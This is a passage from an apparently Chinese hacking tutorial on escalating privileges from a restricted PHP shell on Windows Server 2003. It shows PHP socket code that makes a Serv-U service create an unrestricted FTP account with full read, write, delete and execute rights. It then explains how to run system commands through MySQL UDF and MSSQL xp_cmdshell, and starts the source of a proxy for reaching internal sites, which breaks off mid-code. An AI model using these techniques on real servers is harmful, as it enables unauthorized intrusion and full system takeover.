win2003 PHP服务器的突破新思路(4)
栏目:win服务器问题汇总
时间:2019-10-11 14:27
fputs ($fp, "-SpeedLimitUp=-1\r\n");
fputs ($fp, "-SpeedLimitDown=-1\r\n");
fputs ($fp, "-MaxNrUsers=-1\r\n");
fputs ($fp, "-IdleTimeOut=600\r\n");
fputs ($fp, "-SessionTimeOut=-1\r\n");
fputs ($fp, "-Expire=0\r\n");
fputs ($fp, "-RatioUp=1\r\n");
fputs ($fp, "-RatioDown=1\r\n");
fputs ($fp, "-RatiosCredit=0\r\n");
fputs ($fp, "-QuotaCurrent=0\r\n");
fputs ($fp, "-QuotaMaximum=0\r\n");
fputs ($fp, "-Maintenance=System\r\n");
fputs ($fp, "-PasswordType=Regular\r\n");
fputs ($fp, "-Ratios=None\r\n");
fputs ($fp, " Access=".$homedir."|RWAMELCDP\r\n");
fputs ($fp, "QUIT\r\n");
sleep (1);
while (!feof($fp)) {
echo fgets ($fp,128);
}
}
?>
还可以利用fsockopen编写HTTP代理,从而访问外网或本机中无法外部访问的网站。我手上有一个完整的HTTPProxy(图4),代码较长。有兴趣的读者可以看看。
6、MYSQL/MSSQL接口
不同于linux的是,windows下的mysql/MSSQL一般是以系统管理员身份运行的,因此,只要能拿到本机SQL数据库中的root/sa密码,你就可以直接用PHP连接数据库来执行系统命令。
在Mysql中执行系统命令要利用用户自定义函数“MySQL UDF Dynamic Library”这个漏洞。在MSSQL中只要连接上数据库,就能直接调用“master..xp_cmdshell“扩展执行命令,权限当然是system权限。
总结一下:由于系统、IIS、PHP的版本不一样,以上提到的几个突破方法可能会有所变化,PHP还有许多扩展功能是可以利用的,走出system()那几个系统命令执行函数,你就有可能突破系统安全策略的限制!
后面附上proxy.php的代码
error_reporting(E_ALL);
/*
// This program is free software; you can redistribute it and/or
// modify it under the terms of the GNU General Public License
// as published by the Free Software Foundation; either version 2
// of the License, or (at your option) any later version.
//
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License
// along with this program; if not, write to the Free Software
// Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
//-------------------------------------------------------------------
// Class: PHProxy
// Author: ultimategamer00 (Abdullah A.)
// Last Modified: 6:28 PM 6/22/2004
*/
function __stripslashes($str)
{
return get_magic_quotes_gpc() ? stripslashes($str) : $str;
}
if (!function_exists('str_rot13'))
{
function str_rot13($str)
{
static $alpha = array('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ',
'nopqrstuvwxyzabcdefghijklmNOPQRSTUVWXYZABCDEFGHIJKLM');
return strtr($str, $alpha[0], $alpha[1]);